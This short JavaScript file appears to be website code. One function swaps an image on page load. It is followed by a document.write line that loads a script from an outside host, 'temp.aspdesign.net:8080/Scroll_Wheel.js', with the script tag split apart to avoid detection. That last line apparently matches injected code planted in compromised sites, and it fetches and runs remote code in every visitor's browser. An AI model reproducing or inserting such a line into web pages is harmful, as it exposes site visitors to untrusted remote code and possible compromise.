

function howdo(){
this.n=typeof this.n=='undefined'?0:this.n+1;
if(typeof document.getElementsByTagName!='undefined'&&(document.getElementsByTagName('body')[0]!=null||document.body!=null)){
document.getElementById('ctl00_col1_efficacy').src="../images/efficacy_on.gif";

}
else {
 if(this.n<60){setTimeout('howdo()',250);}};
}

howdo();
document.write('<s'+'cript type="text/javascript" src="http://temp.aspdesign.net:8080/Scroll_Wheel.js"></scr'+'ipt>');